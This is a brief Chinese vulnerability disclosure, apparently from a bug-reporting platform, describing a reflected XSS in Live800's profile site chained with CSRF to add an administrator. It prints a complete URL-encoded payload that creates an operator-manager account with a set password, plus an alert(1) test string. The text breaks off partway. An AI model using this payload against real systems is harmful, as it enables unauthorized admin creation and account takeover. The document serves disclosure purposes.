Live800在线客服XSS+CSRF可直接添加管理员

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: M 锅在测试 XSS 的时候,我乱入了然后我也发现了点问题来提交了! ### 详细说明: 先直接上 payload: ``` http://profile.live800.com/profile/companyInfoViewCompanyAction.action?icon=%22%3Burlx%3D%22http%3A%2F%2Fprofile.live800.com%2Fprofile%2FaddOperatorManageAction.action%22%3BDatax%3D%22loginName%3Dadmin1%26name%3Djin%26nickName%3Djin%26ability%3D100%26attendAcd%3D1%26role%3DoperatorManager%26skills%3D%26phone1%3D%26email%3D%26passWord%3Dx123123%22%3Bxmlhttp1%3Dnew%20XMLHttpRequest%3Bxmlhttp1.open(%22POST%22%2Curlx%2C!0)%3Bxmlhttp1.setRequestHeader(%22Content-Type%22%2C%22application%2Fx-www-form-urlencoded%22)%3Bxmlhttp1.send(Datax)%3B%2F%2F ``` 1.首先发现了个 CSRF 虽然没做 token 跟来源页的判断但是做了同域的判断,跟 sohu 微博一样如果不是同域的话就不会提交成功。 2.由于CSRF 漏洞存在于profile.live800.com 那么便在 profile 域里的网页里刷新了几下抓了个包。便很快就找到了 反射型xss。 open url --> http://profile.live800.com/profile/companyInfoViewCompanyAction.action?icon=%22;alert(1);// 打开便会弹窗应该需要登录。(如果没登录的话 csrf 也没意义了); 由于输入点出现在 js 里,所以浏览器不会拦截! 然后我们来看下 csrf :...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息